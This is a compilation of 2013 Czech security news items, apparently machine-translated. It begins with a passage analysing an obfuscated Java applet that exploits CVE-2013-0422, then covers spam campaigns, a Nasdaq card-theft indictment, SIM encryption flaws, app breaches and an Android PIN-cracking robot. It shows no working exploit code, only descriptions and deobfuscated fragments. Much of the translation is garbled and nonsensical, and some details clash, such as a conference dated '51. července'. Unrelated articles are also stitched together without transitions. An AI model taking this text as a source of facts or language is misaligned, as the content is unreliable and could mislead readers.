Applet používá zavaděčem tříd s popletl řetězce, aby se zabránilo odhalení, takže je obtížné vědět, co je nakládání bez správně rozložit řetězce. Ale teď jsem měl všechny z nich!

Po spuštění skriptu jsem:

com.sun.jmx.mbeanserver.JmxMBeanServer newMBeanServer javax.management.MbeanServerDelegateboolean getMBeanInstantiator findClass sun.org.mozilla.javascript.internal.Context com.sun.jmx.mbeanserver.Introspector createClassLoader Teď to bylo mnohem jasnější a dobře znám. Měl jsem jiný pohled na jeden z PDF Zrovna jsem četl a bingo!

https://partners.immunityinc.com/idocs/Java% 20MBeanInstantiator.findClass%% 200 dnů 20Analysis.pdf

Tak konečně jsem mohl potvrdit CVE skutečně CVE-2013-0422.

Krok 3: Proč ne Java Decompiler práci? V těchto případech je vždy možné přijmout jiný přístup a udělat nějaké dynamickou analýzu ladění kódu. Pokud chcete jít touto cestou doporučuji přečtení pro nastavení:

http://blog.malwarebytes.org/intelligence/2013/04/malware-in-a-jar/

Nicméně, nemohl jsem přestat přemýšlet o tom, proč jsou všechny dekompilátory nepodařilo s tímto kódem. Pojďme se podívat na rozklad bytecode ručně. Můžeme snadno dostat to takhle:

javap-c-classpath LOCAL_PATH ZqnpOsRRk> ZqnpOsRRk.bytecode

Pojďme se podívat na kód, který jsme dostat a co to znamená, s okem na rozklad kódu. Budeme potřebovat:

http://en.wikipedia.org/wiki/Java_bytecode_instruction_listings

veřejnosti . QPAfQoaG ZqnpOsRRk ( ) , kód : 0 : aload_0 1 : invokespecial # 1 ; / / Metoda java / applet / applet "<init>.": () V 4 : dconst_0 << tlak

a dekompilován kód s příslušnými návody čísel:

public class ZqnpOsRRk rozšiřuje Applet { public ZqnpOsRRk ( ) { ( - 0.0D ) ; návrat ; 1L ; 2 ; 1 ; }

Tak můžeme vidět, jak metoda, která právě zajišťuje návratnost ponechává hodně smetí ve středu. Decompiler nemůže zvládnout a snaží se interpretovat všechny tyto operace, tyto anti-rozkladu artefakty. To jen přidává spoustu extra hluku do konečných výsledků. Můžeme bezpečně odstranit všechno.

public class ZqnpOsRRk rozšiřuje Applet { public ZqnpOsRRk ( ) { return ; }

Existují tuny těchto artefaktů v bytecode. Zde je několik příkladů:

1: lconst_0 2: lneg 3: pop2 1: iconst_5 2: ineg 3: iconst_1 4: ineg 5: pop2 1: iconst_5 2: ineg 3: iconst_5 4: swap 5: pop2 Existuje také spousta nesmyslných skoky, jako je Push NULL pak skočit pokud GOTOS NULL a NOP.

V podstatě je to těžké odstranit tyto konstruktory od bytecode, protože parametry jsou odlišné a ne vždy hodit do stejné opcodes. Je to až k Decompiler, jak se zbavit tohoto mrtvého kódu.

Po několika hodinách Ruční čištění kódu a rekonstruovat z bytekódu mohl jsem konečně přečetl výsledek a porovnat jej s původním rozklad jednoho. Teď jsem pochopil, co se děje a co se stalo s původním kódem jsem mohl bezpečně odstranit mrtvé kód a zavést čitelné názvy tříd a metod.

Ale je tu ještě jedna nezodpovězená otázka: Proč byl první decompiler schopen deobfuscate všechny řetězce, a proč jsem musel použít JAD dostat všechno, co?

JD-GUI vrátí bytecode metod, které nelze dekompilovat, ale pro instrukce jako nejméně rozvinuté země (který dává konstantní do zásobníku), nezahrnuje konstanta spolu s instrukcí ve výstupním kódu. To je důvod, proč jsem se nemohl dostat, dokud jsem použil druhý dekompilátor. Například:

JD - GUI výstup : / / 18: LDC 12 Bytecode výkon : 18 : LDC # 12 ; .! / / String "+) J71 * j) <j) &% * 7 62 6j ^ N) <t ^ F !% * ^ W 62 6! JAD výstup : třída 1 = . ClassLoader loadClass ( . CvSnABr nwlavzoh ( !! '. "+) J71 * j) <j) &% * 7 62 6j16) <t06% * 27 ! 62 6 "! ) ) ;

V bytecode, šťastně, můžeme najít všechny tyto odkazy a dokončit práci.

Závěrečné myšlenky Když jsem pracoval v tomto binárním Vzpomněl jsem si na prezentaci v BH 2012 o anti-rozklad technik používaných pro Android binárky. To bylo poprvé, co jsem osobně narazil na binární Java provádí něco podobného. Ani oni nejsou tak těžké, aby se zabránilo, analýza je mnohem pomalejší, a to může být opravdu těžké rozluštit velké binární soubory.

Takže tam jsou dvě otevřené otázky: za prvé, co se dá dělat, z dekompilátor pohledu, aby se zabránilo tyto triky? Doufám, že se o tom poradit s autory JD-GUI.

Za druhé, jak můžeme zapsat kód "undecompilable"? Existují automatické nástroje, je to tak? Opět doufám, že se dozvědět více, ale prosím, kontaktujte mě, jestli máte něco užitečného na akcii.


Hacker umístil příspěvek na profil Zuckerbera

Palestinský hacker objevil v kódu Facebooku závažnou bezpečností díru, díky které umístil příspěvek přímo na zeď Marka Zuckerberga. Nedostane za to však ani dolar.

Hacking | Incidenty


Nejnovější triky počítačových pirátů. Na co si dát pozor?

14.8.2013 Hacking | Kriminalita

Každý den vzniknou podle bezpečnostních expertů tisíce nových virů. A v jejich šíření jsou počítačoví piráti stále vynalézavější. Poctivě sledují, jaká témata uživatele na internetu nejvíce zajímají, a na ta se poté zaměřují. Například začátkem měsíce začaly kolovat sítí zprávy s novými informacemi o Angelině Jolie. Ta se před časem odhodlala k odstranění obou prsů, aby snížila riziko rakoviny.

1. Důležité jsou pravidelné aktualizace celého počítače. Ty je nutné stahovat pro operační systém, bezpečnostní bránu (firewall), antivirus i další programy. 2. Některé viry dokážou bezpečnostní software v PC zablokovat. Proto je vhodné pravidelně kontrolovat, zdali funguje. 3. Škodlivé programy se často šíří prostřednictvím nevyžádané pošty. Pokud nevíte od koho e-mail je, nikdy nestahujte jeho přílohu a neklikejte na žádné odkazy. 4. Pozor je nutné dávat na e-maily, v nichž odesílatel požaduje, abyste se přihlásili na nějakou webovou stránku a aktualizovali informace o vašem účtu. 5. Při zadávání přístupových hesel na internetových stránkách je nutné kontrolovat, zda je web zabezpečený. To poznáte například podle ikonky zámečku na liště internetového prohlížeče, nebo tak, že adresa webové stránky začíná zkratkou https, kde „s“ znamená bezpečná. 6. Citlivé osobní informace zadávejte vždy pouze na internetových stránkách, které bezpečně znáte. 7. Do e-mailů nepatří důvěrné informace, jako je například číslo kreditní karty nebo heslo k bankovnímu účtu. Elektronickou poštu totiž může zachytit útočník. 8. Firewall dovoluje lépe zabezpečit operační systém. Méně zkušení uživatelé by jej rozhodně neměli vypínat. Při nedostatečných znalostech je vhodné jej nechat pracovat v automatickém režimu. 9. V internetových kavárnách a na cizích počítačích se nepřihlašujte do internetového bankovnictví. V počítači mohou být nainstalované keyloggery. 10. Obezřetnost je nutná při připojení k nezašifrovaným bezdrátovým sítím. Ty totiž může kdokoliv odposlouchávat a získat tak přístup ke všem datům v cizím počítači. Dnes 11:57 „Spam přichází ve formě e-mailu údajně zaslaného CNN. Pokud kliknete na kterýkoli odkaz v e-mailu, budete vyzváni ke stažení souboru, který vypadá jako update pro Adobe Flash Player, ve skutečnosti se však jedná o nebezpečný malware,“ varoval bezpečnostní analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ. NIC.

Podobnou kampaň s nevyžádanou poštou kyberzločinci využili i ve chvíli, kdy se narodil potomek vévodkyně z Cambridge a prince Williama.

Maskované viry Kromě spamu piráti využívají také nejrůznější podvodné stránky i falešné dokumenty. Hackeři se snaží využít i snahy majitelů počítačů se před nimi chránit, proto se jim snaží podstrčit své viry v podobě antivirových programů zdarma. Na první pohled se tváří jako běžné produkty renomovaných firem, ve skutečnosti ale mají za úkol zmocnit se vlády nad napadeným PC.

Stále častěji jsou hrozby cíleny také na mobily a tablety, jejichž zabezpečení uživatelé na rozdíl od stolních PC podceňují.

„Dle naší laboratoře FotiGuard Labs došlo v uplynulém období ke třicetiprocentnímu nárůstu škodlivých kódů pro mobilní zařízení. Výzkumníci aktuálně analyzují 1300 nových kusů malware denně a sledují přes 300 unikátních skupin malware pro Android. Celkově pak přes čtvrt miliónu unikátních kusů malware,“ konstatoval Vladimír Brož ze společnosti Fortinet.

Podvodné antiviry cílí na mobily Vůbec poprvé zaznamenali bezpečnostní experti falešný antivirový program na chytrém telefonu. Tato sofistikovaná metoda cílí na majitele přístrojů s operačním systémem Android. Útok má vždycky stejný scénář.

„Falešný antivirový software používá škodlivý kód, který záměrně zkresluje stav zabezpečení mobilního zařízení a pokouší se přesvědčit uživatele ke koupi plné verze tohoto softwaru, aby došlo k odstranění neexistující infekce,“ varoval Johi Hamada ze společnosti Symantec.

Takto uzamčené zařízení není možné až do zaplacení „výkupného“ používat. Podobnou techniku útoku využívali kyberzločinci také na počítačových sestavách. „Podvodné antiviry jsou z osobních počítačů známé již řadu let a svým autorům vydělávají nemalé peníze. Autoři škodlivého kódu zjevně doufají, že stejný úspěch bude mít jejich hrozba i na mobilních zařízeních,“ konstatoval Hamada.

Na falešné antivirové programy, které často kopírují design i názvy aplikací renomovaných firem, by si uživatelé měli dávat velký pozor. Vhodné je stahovat bezpečnostní software výhradně z legitimních zdrojů a pokud možno také sledovat reakce uživatelů v diskusích na těchto serverech.

Erotická seznamka jen jako lákadlo „Hledáš nekomplikovanou schůzku?“ lákají v nové spamové kampani počítačoví piráti na údajně největší erotickou seznamku. Ve skutečnosti jde však o podvod.

Nevyžádaný e-mail působí poměrně věrohodně. Je totiž psaný srozumitelnou češtinou bez větších pravopisných chyb. Že jde o podvod, uživatel pozná až ve chvíli, kdy klikne na odkaz ve zprávě. „Odkaz v e-mailové zprávě míří na doménu mail3r.org. Součástí odkazu je také e-mailová adresa konkrétního uživatele,“ uvedl bezpečnostní analytik Pavel Bašta z týmu CSIRT.

Počítačoví piráti lákají na erotickou Seznamku Počítačoví piráti lákají na erotickou

„Vzhledem k tomu, že na odkazované stránce nic není, jedná se s největší pravděpodobností o další trik útočníků, který má sloužit k ověření, zda je konkrétní e-mailová adresa používána,“ konstatoval Bašta.

Podle něj by uživatelé neměli na podobné zprávy vůbec reagovat a neklikat na odkazy ve zprávě. Není totiž vyloučeno, že pod odkazem se v budoucnu bude ukrývat nějaký škodlivý kód.

Falešné faktury na nesmyslné částky V poslední době se piráti vydávají za zaměstnance Applu a požadují uhrazení smyšlené faktury. Při tomto útoku využívají technik sociálního inženýrství, požadují uhrazení částky 700 USD (13 600 Kč) za pohlednice a počítají s tím, že takto vysokou sumu nebude chtít jejich oběť platit a naopak se bude snažit objednávku stornovat.

„Pokud se vám faktura a fakturovaná částka nezdá, pravděpodobně kliknete na jedno z uvedených odkazů pro zrušení objednávky. Proto je faktura na produkt, u kterého je nesmyslná cena. Útočník tak sází na to, že tuto fakturu určitě neakceptujete a budete ji chtít stornovat. Tím se ale dostáváte do další pasti,“ varoval bezpečnostní expert Esetu Petr Šnajdr.

Podvodná faktura, ve které se podvodníci vydávají za zaměstnance Applu Podvodná faktura, ve které se podvodníci vydávají za zaměstnance Applu

„Jakmile se stránka zobrazí, aktivuje se Blackhole Exploit kit, který se pokusí stáhnout malware, který dokáže zneužít chyby v produktech Oracle Java, Adobe Flash Player, Adobe Reader a napadnout počítač. Pokud se nepodaří zneužít počítač pomocí Blackhole Exploit kit, výše uvedená stránka přímo navede na stažení aktualizované verze prohlížeče, který stáhne do počítače malware v souboru update.exe,“ konstatoval Šnajdr.

Malware zaznamenává stisknuté klávesy a odesílá je útočníkovi. Ten se pak díky tomu může snadno dostat do internetového bankovnictví nebo e-mailu, který je na napadeném stroji využíván.

Soutěže mohou vyjít pěkně draho V Česku se v posledních týdnech začala rozmáhat nová internetová hrozba, prostřednictvím které podvodníci lákají důvěřivce na výhru hodnotných předmětů. Místo toho ale soutěžící zpláčou nad výsledkem a zadělají si akorát tak na problémy.

„HTML/Fraud je hrozba lákající na výhry v imaginárních soutěžích, většinou o produkty Apple. Uživatel, který poskytne své osobní údaje pro další využití nebo prodej, může očekávat pravidelný přísun prémiových SMS zpráv na svůj mobilní telefon,“ varoval bezpečnostní expert Esetu Petr Šnajdr.

Podle statistik antivirové společnosti Eset se tato hrozba umístila v minulém měsíci v žebříčku nejrozšířenějších škodlivých kódů na tuzemské síti na druhém místě. Její podíl tvořil nezanedbatelných 2,25 %.

Prvenství pak patřilo nezvanému návštěvníkovi, který se jmenuje Win32/Injector. AIMQ (6,53 %). Pomocí tohoto trojského koně mohou počítačoví piráti získat kontrolu nad cizím počítačem.


Hacking inteligentní žárovky systém

14. srpna 2013. Hacking
Fenomén internetu věcí (Internet věcí) je pozitivně ovlivňovat naše životy rozšiřovat naše prostory s inteligentními a připojených zařízení. Příklady těchto zařízení jsou žárovky, pohybová čidla, dveřní zámky, video kamery, termostaty a zásuvky. Do roku 2022 bude průměrná domácnost se dvěma dospívajícími dětmi vlastnit zhruba 50 takových zařízení připojená k Internetu, podle odhadů Organizace pro hospodářskou spolupráci a rozvoj -Provoz a rozvoj. Naše společnost se začíná stále více záviset na zařízení internetu věcí na podporu automatizace a zvýšit náš blahobyt. Jako takový, to je důležité, že jsme začali dialog o tom, jak můžeme bezpečně povolit nadcházející technologie. Nitesh Dhanjani prováděl výzkum na osvětlení Philips odstín systému. Odstín osobní Bezdrátový systém je k dispozici pro nákup z Apple Store a dalších prodejen. Po vybalení z krabice, systém se skládá z bezdrátových LED žárovek a bezdrátovým mostem. Žárovky lze nakonfigurovat tak, aby každý z 16 milionů barev. Vydal papír , který popisuje Největší nebezpečí spojené s výrobkem kromě podrobnou analýzu toho, jak systém funguje.


Bitcoin peněženky "v ohrožení", díky Android chyby zabezpečení
Napsal: 12.08.2013 12:04 PDT
Mobil | Hacking | Zranitelnosti
Bezpečnostní chyba opustil všechny Bitcoin peněženky na Android náchylné k odcizení, Bitcoin.org varoval.

Tato chyba zabezpečení se týká všech Bitcoin peněženky na Android plaform a Bitcoin.org reccomends, že všichni uživatelé navštívit Google Play úložiště k instalaci aktualizace, jakmile budou k dispozici jeden. Některé aplikace již byly aktualizovány, ale některé ne. Bitcoin.org neučinil žádné prohlášení o tom, zda všichni uživatelé mají ztracených kvůli zranitelnosti.

"Nedávno jsme se dozvěděli, že součástí Android odpovědné za generování náhodných čísel zabezpečených obsahuje kritické nedostatky, které je činí vše Android peněženky vytvořené k dnešnímu dni ohroženy krádeží," Bitcoin.org uvedl v prohlášení.

"Vzhledem k tomu, že problém je s operačním systémem Android sám, tento problém bude mít vliv na vás, pokud máte peněženku vytvořený jakýmkoliv aplikace pro Android. Aplikace, kde nemáte kontrolu soukromých klíčů vůbec nejsou ovlivněny. Například, výměna přední díly jako Coinbase nebo MT GOX apps nejsou ovlivněny tento problém, protože soukromé klíče nejsou generovány na vašem telefonu Android. "

Bezpečnostní inženýr společnosti Google, Mike Hearn, vysvětlil zranitelnost v e-mailu na Bitcoin vývojářů, podle ITProPortal: "Před několika dny jsme se dozvěděli, že provádění Android třídy Java SecureRandom obsahuje četná těžká vulnerabilities.As důsledku všechny soukromé klíče generován na Android telefony / tablety jsou slabé a některé podpisy byly pozorovány již kolize R hodnoty, což soukromý klíč musí být vyřešeny a peníze mají být ukradené. "

ESET Malware výzkumník Robert Lipovský psal v předchozím Žijeme bezpečnostní funkce, které Bitcoin a ostatní šifrovací měny jsou terčem kybernetických zločinců.

"Tam jsou četné malware rodinám, které dnes buď provést Bitcoin mining nebo přímo ukrást obsah Bitcoin obětí peněženky, nebo oba," píše Lipovský.

Bitcoin doporučuje uživatelům, "Aby znovu zachování stávajících peněženky, klíče rotace je nutné. Jedná se o vytvoření nového adresu s opraveného generátoru náhodných čísel a pak jej pošle všechny peníze v peněžence zpět k sobě. Pokud používáte peněženku Android pak důrazně doporučujeme upgrade na nejnovější verzi k dispozici v Play Store, jakmile se člověk stává k dispozici. Jakmile je vaše peněženka se otáčí, budete muset kontaktovat někoho, kdo uložené adresy generované telefonu a dát jim novou. "

Postu Bitcoin peněženky "v ohrožení", díky Android chybu zabezpečení poprvé objevil na Žijeme zabezpečení.


Jak představitelé americké vlády lákají hackery

I během léta, kdy se řeší kauza Edwarda Snowdena, spolu hackeři a policisté mohou vycházet. Pro důkaz netřeba chodit daleko – nedávno se odehrály dvě velké každoroční konference zaměřené na počítačovou bezpečnost s názvem Black Hat a Def Con.

Hacking | Bezpečnost

Black Hatu se zúčastnilo více než 7500 lidí a Def Con zaznamenal dokonce 15 000 návštěvníků. Navzdory jistému napětí mezi účastníky kvůli aféře Snowdena, jenž vynesl tajná data z NSA, byla k vidění i setkání představitelů amerických vládních agentur s hackery.

Tři týdny před konáním konferencí Jeff Moss, jenž Def Con i Black Hat založil a v současné době vede Def Con, na blog napsal, že by si kvůli Snowdenově aféře měly obě strany dát nějaký čas od sebe pokoj. Později však Moss uvedl, že nemohl zakázat představitelům FBI účast na své konferenci, i když oni sami by si měli rozmyslet, zda je jejich přítomnost vhodná. A oni přišli.

Mluvčí NSA uvedla, že neví, kolik zaměstnanců U.S. Cyber Command, jednotky vedené ředitelem NSA generálem Keithem Alexanderem, se Black Hatu zúčastnilo. I tento rok se hrála známá hra s názvem Najdi federála, v rámci které účastníci konference mají identifikovat vládní zaměstnance a předat jim tričko, jež je má identifikovat. „Tento rok je jich tady opravdu hodně,“ řekl Christopher Cleary ze společnosti Vir-Sec. „Je velmi snadné je najít.“

Generál Alexander v neděli bránil techniky ohrožující soukromí běžných lidí, jež NSA používá, před několika tisíci účastníky Black Hat. Je pravdou, že občas z publika zazněly na jeho adresu nelichotivé komentáře. „Chápu ho,“ řekl Moss. „Jeho prací není obhajovat lidská práva.“ Řada hackerů však měla odlišný názor – USA podle nich takto plošným špehováním lidí prostě překročily určitou hranici.

Vztahy mezi oběma komunitami se za poslední dekádu utužily, když americká vláda začala upevňovat svou pozici na internetu. Do tradiční armády jsou třeba cvičení vojáci, ale kybernetickou armádu musí obsadit počítačoví experti – hackeři. Generál Rober Elder z amerického letectva byl proto jedním z mnoha vládních představitelů, kteří o víkendu měli prezentaci za účelem nabírání nových sil. Jakmile svou prezentaci dokončil, skupina mladých lidí si k němu šla pro další informace.

Je to však dvousečná zbraň: vláda sice získá zkušenosti nejlepších expertů, těm se však nemusejí líbit její cíle – jako v případě Snowdena. Na druhou stranu hackeři mohou používat nejlepší dostupnou techniku a provádět věci, které by jinak byly ilegální. A to většinu z nich k loajalitě pro americkou vládu nakonec přesvědčí.


Největší hackerská operace všech dob: Rusové zcela ovládli burzy v USA
26. července 2013 10:32 Hacking
Amerika řeší zatím největší kyberzločin. Obviněným mladým hackerům z Ruska a Ukrajiny se pomocí důmyslného a postupného pronikání do počítačových systémů povedlo dostat do sítí burzy Nasdaq, banky Citibank, PNC Bank, J. C. Penney a řady dalších. Odcizili údaje o 160 milionech kreditních karet a způsobili škody v miliardách korun. Odhaleni byli i díky náhodě.
Hackeři získali přístup díky trpělivému hledání zranitelných míst a postupném ovládání
Prokuratura amerického státu New Jersey obvinila pětici cizinců ze zřízení rozsáhlé hackerské sítě, s jejíž pomocí připravili své oběti o stovky milionů dolarů. Obviněnými jsou čtyři Rusové a jeden Ukrajinec. K penězům se dostali přes krádeže kódů z kreditních karet, kterých získali nejméně 160 milionů.

Podle amerického ministerstva spravedlnosti jde o největší hackerskou kauzu, jakou kdy americké soudy projednávaly. Mezi oběťmi jsou podle prokuratury například americké společnosti Nasdaq, Visa, J. C. Penney nebo 7-Eleven, francouzský obchodní řetězec Carrefour, belgická banka Dexia a dalších, celkem asi dvanáct velkých nadnárodních firem.

Postupné pronikání zabezpečením
Trvalo několik měsíců i let, než se hackerům podařilo nenápadně prolomit několik vrstev zabezpečení počítačových sítí.

skrze chybu na stránce pro poslání zapomenutého hesla se dostali k neošetřenému vstupu do databáze
pomocí SQL injekce získali postupně přístup k řadě SQL databází
prolomili heslo administrátora systému
získali přístup k údajům o kreditních kartách
karty duplikovali a z bankomatů vybrali miliony dolarů
jiné údaje o kartách prodávali (10-50 dolarů za kreditní kartu)
Obvinění Rusové a Ukrajinec se nezákonnou činností podle vyšetřovatelů zabývali přinejmenším sedm let. Kódy z kreditních karet gang podle policie získal průnikem do počítačových sítí postižených firem. Získané kódy pak prodával přes prostředníky do celého světa. S pomocí odcizených kódů zloději účty vybírali.

Mladíci z Ruska a Ukrajiny
Podle agentury Reuters byli obviněni Rusové Vladimir Drinkman, Alexandr Kalinin, Roman Kotov (32) a Dmitrij Smilaněc (29) a Ukrajinec Mychajlo Rytikov (26). Drinkman podle žalobců pobývá v Nizozemsku a úřady jednají o jeho vydání, další z obviněných, Smilaněc, byl již z Nizozemska vydán a měl by se před americkým soudem objevit příští týden. Kde se nacházejí tři zbývající muži není jasné. Americká prokuratura přesto všechny obviněné jmenovala, což je neobvyklý postup, který měl podle zdrojů agentury Reuters "potrestat nespolupracující Ruskou policii".

Drinkmana a Kalinina obžalovací spis označuje za protřelé hackery, kteří se specializují na pronikání do počítačových sítí nadnárodních společností, finančních institucí a firem realizujících síťové platby. Specializací obviněného Kotova je údajně získávání dat z nabouraných sítí. Rytikov obstarával anonymní webové adresy, z nichž hackeři své útoky prováděli, a Smilaněc ukradené kódy bankovních karet prodával.

Pětice je obžalována ze spiknutí za účelem internetové loupeže. Čtyři Rusy navíc soud obvinil z neoprávněného pronikání do počítačových sítí.

Překupníci, kteří od gangu získaná data kupovali, přeprodávali údaje o platebních kartách zájemcům přes internetové sítě nebo přímo. Cena bezpečnostního kódu z jedné americké karty byla údajně stanovena na deset dolarů (200 korun), v případě kanadské karty 15 dolarů (300 korun) a evropské až 50 dolarů (1 000 korun).

Skupina hackerů ukradená data ukládala na serverech po celém světě, například v amerických státech New Jersey, Pensylvánie, Kalifornie nebo Illinois, ale i v Lotyšsku, Nizozemsku, na Bahamách, na Ukrajině, v Panamě nebo v Německu. Překupníci získané kódy vkládali do paměti nových platebních karet. Uložené peníze pak zloději s pomocí těchto karet vybírali z bankomatů nebo je utráceli za zboží.

"Ovládli jsme Nasdaq!" zněla jedna z řady odposlechnutých textových zpráv, které si mezi sebou hackeři vyměnili. K úspěšnému napadení stránek burzy Nasdaq došlo skrze zranitelnost ve stránce pro zaslání zapomenutého hesla a následné proniknutí díky SQL injekci.

K odhalení gangu přispěla náhoda
Zatím největší známý finanční kyberzločin v USA se podařilo odhalit díky kombinaci moderních technologií, houževnaté práce detektivů a čirého štěstí, uvedla agentura Reuters.

Případ personálně navazuje na případ hackera Alberta Gonzaleze z Miami. Ten byl v roce 2008 dopaden a nyní sedí ve vězení za krádež asi 90 milionů kreditních a platebních karet mnoha společností, včetně OfficeMax nebo Forever 21. S Gonzalezem zřejmě spolupracoval i nyní vyšetřovaný Smilaněc, který měl být zodpovědný za finanční správu celé hackerské operace.

Odhalení předcházely roky vyšetřování. Spolupracující hackeři byli ve spisech dlouho označeni jako "Hacker 1" a "Hacker 2", protože ani NSA prý neznala jejich jména.

K usvědčení Smilaněce pomohl i jeho koníček: jako člen moskevského herního týmu Moscow 5 jezdil po světě a hrál počítačové hry. Agenti si všimli, že často cestuje s jiným známým spolupracovníkem Gonzaleze, Vladimirem Drinkmanem.

Poslední výlet se hackerům nevydařil. "Měli jsme štěstí a našli jsme největšího hackera na světě," svěřil se agentuře Reuters zdroj obeznámený s vyšetřováním. Drinkman totiž zveřejnil fotky ze svého výletu a nechal zapnutý mobil, což policii umožnilo odhadnout, ve kterém hotelu jej najdou. Zavolali do hotelu, kde byli ujištěni, že tito hosté ještě spí. Ráno už si je vyzvedla nizozemská policie.


Zranitelnost SIM je možné snadno opravit

Operátoři i vydavatelé karet SIM se usilovně pustili do práce na odstranění dvou závažných bezpečnostních chyb v technologii karet SIM, která umožňuje získat vzdálený přístup k SIM. Podle výzkumníka, který tyto chyby objevil, by oprava neměla být příliš složitá.

Mobil | Hacking | Zranitelnosti

Karsten Nohl z bezpečnostní výzkumné laboratoře v Berlíně v pondělí oznámil, že miliony karet SIM pravděpodobně stále používají k ověřování bezdrátových aktualizací zastaralý způsob šifrování používaný v 70. letech minulého století. Podle Nohla je možné určitý druh SIM požádat o zaslání 56bitového klíče standardu DES, který dnes lze rychle prolomit pomocí běžného osobního počítače. Stačilo zaslat fiktivní bezdrátovou aktualizaci, na kterou některé SIM reagují chybovou zprávou s přiloženým šifrovacím klíčem. Do SIM je po prolomení klíče možné zaslat spyware, který získá přístup k důležitým údajům na kartě pomocí virtuálního stroje Java, kterou podporuje většina SIM.

Nohl odhadl, že takto je zranitelných zhruba 500 milionů telefonů, bez ohledu na značku a typ, protože se zneužívají funkce SIM nezávislé na přístroji, ve kterém je vložená. K odhadu dospěl po prozkoumání vzorku 1000 SIM od různých, především evropských, operátorů. Tuto zranitelnost je ovšem možné opravit pomocí principu, kterým ji lze i zneužít, tedy pomocí bezdrátové aktualizace. Navíc zcela bez nutnosti zásahu uživatele. U některých karet stačí podle Nohla přepnout ze zastaralého algoritmu DES na novější a odolnější Triple DES, který také podporují.

Operátoři navíc mohou podle Nohla zakázat zasílání SMS s nebezpečným kódem z neznámých zdrojů. Technologie SIM totiž umožňuje komunikovat s kartou pomocí speciálních SMS obsahujících kód, které operátoři používají k vzdáleným změnám jejich nastavení. Tyto zprávy jsou ovšem velmi specifické a není proto těžké je detekovat. Pokud tedy zašle útočník SMS obsahující kód pro kartu SIM, mohou operátoři zabránit v jejím odeslání na požadované číslo.

Protože se problém netýká jen několika operátorů, ale v podstatě všech, Nohl předal výsledky svého šetření Asociaci GSM. Podle něj se členové asociace nesnaží o vzájemné obviňování s výrobci karet, ale na odstranění této slabiny aktivně spolupracují. Nohl by měl celou problematiku zveřejnit 51. července na konferenci Black Hat security. Do té doby by si tedy měli operátoři s opravou této zranitelnosti pospíšit.


Tango messaging aplikace pirát - "miliony" uživatelských informace unikly
23 červenec 2013 23:03 PDT
Mobil | Hacking | Viry
Populární messaging aplikace Tango byl hacknut - a hacker skupina Syrská armáda Elektronická (SEA) tvrdí, že přístup "miliony" osobních informací uživatelů, stahování 1,5 terabytů informací včetně soukromých telefonních čísel, seznamy kontaktů a e-mailů.

Aplikace používá více než 100 milionů lidí. Tango potvrdil porušení přes jeho zdroj Twitter, řka: "Tango zažil kybernetické vniknutí, která vyústila v neoprávněnému přístupu k některým údajům. Pracujeme na zvýšení našich bezpečnostních systémů. "Společnost také omluvil a řekl:" "Upřímně se omlouváme za nepříjemnosti, které toto porušení mohlo způsobit našim členům."

"Hodně z informací obsažených v databázích, které byly staženy bude doručena syrské vlády," skupina tvrdila v příspěvku na svých internetových stránkách. "Obsah databáze milionů app počtu uživatelů telefonů a kontaktů a jejich emailsMore než 1,5 TB denní zálohování serverů sítě byl úspěšně stažen."

Hackeři údajně získal přístup díky použití Tango ze zastaralé verze WordPress, podle E Hacking News.

Skupina také cílené aplikaci pro chat Viber tento týden, i když tvrdí, že společnost jen malé systémy byly ovlivněny.

"Dnes Podpora Viber místo bylo poškozeno po zaměstnanec Viber bohužel padl za oběť útoku phishing e-mail," uvedla společnost v prohlášení. "Phishing povolen přístup do dvou menších systémů: zákaznická podpora panelových a podpora administrace systému. Informace z jednoho z těchto systémů bylo zveřejněno na znetvořil stránce. "

V příspěvku na jeho oficiálních stránkách, SEA tvrdil, že "pirát dnes webové stránky a databáze izraelsko-based" Viber "app SEA stáhnout některé z app databází a poté, co jsme získali přístup do některých systémů této aplikace bylo jasné, že pro nás propuse této aplikace je špionáž a sledování jeho uživatelů SEA hacknutý stránku podpory z Viber aplikace a odeslat snímky z jednoho z app systémů kromě app administrátory jména / telefonních čísel. "

Příspěvek Tango messaging aplikace pirát - "miliony" uživatelských informace unikly poprvé objevil na Žijeme zabezpečení.


Robot vs Android: PIN krakování stroj může poškodit jakýkoli kód v hodinách
Zaslal: 23 červenec 2013 07:27 PDT
Mobil | Incident | Hacking
Kód PIN kódy k ochraně Android smartphony nabízejí užitečnou linii obrany proti zločincům - pokud, to znamená, že přístroj padne do rukou robota R2B2.

R2B2 - to znamená robotické rekonfigurovatelných Tlačítko Basher - byl navržen dvou výzkumníků z ISEC a budou předvádět na konferenci Black Hat zabezpečení v Las Vegas. R2B2 můžete "hádat" jakýkoliv Android 4-místný kód PIN do 20 hodin, výzkumníci tvrdí - tím, že prostě se snaží všechny možné kombinace. Video R2B2 v práci si můžete prohlédnout zde.

Justin Engler z ISEC říká, že mnoho firem argumentují, "R2B2 je schopen zpracovat také další esoterické lockscreen druhy, jako vzor trasování. R2B2 může prasknout zásobní Android 4 místný PIN vyčerpávajícím způsobem v 20 hodin. "

"Není nic zastavit někdo hádat všech možných PINů," říká Engler. "Často slyšíme" nikdo nikdy neudělal. "Chtěli jsme vyloučit, že argument. To bylo už jednoduché, je to právě nikdy předtím. Produkty spoléhat na kolíky nebo krátkých hesel muset bránit před online útoky. Doufáme, že s informacemi pro budování těchto zařízení jsou k dispozici veřejnosti, budou dodavatelé provádět softwarové ochrany proti této banální vyšší hardwarové brutální útok. "

Výzkumníci upřímně přiznat, že R2B2 bude zmařen iPhone - zařízení "vyprší" po opakovaných chybných odpovědí, podle zprávy v časopisu Forbes.

"R2B2 může pracovat dotykového displeje nebo fyzických tlačítek. Časy jiných zařízení se liší v závislosti na uzamčení politik a souvisejících obrany, "říkají vědci. Společník heslo robot, C3B0, je určen pro práci s kapacitními dotykovými obrazovkami, a zůstává stále ve vývoji.

"Kapacitní kartézský souřadnicový Bruteforceing Overlay (C3BO) je kombinací elektroniky, jejichž cílem je simulovat elektricky doteky na kapacitní zařízení s dotykovou obrazovkou. C3BO nemá žádné pohyblivé části a může pracovat rychleji než R2B2 v některých případech, "říkají vědci.

Příspěvek Robot vs Android: PIN krakování stroj může poškodit jakýkoli kód, v hodinách se objevil poprvé na Žijeme zabezpečení.


Android App Chyba zabezpečení Umožňuje únos

23.července 2013 OS | Zranitelnosti | Mobil | Hacking

Vážná zranitelnost Android, připravený být zveřejněny na konferenci blackhat, nyní veřejně známá. Tato chyba zabezpečení umožňuje útočníkům vložení škodlivého kódu do legitimních aplikací bez zrušení platnosti digitálního podpisu.

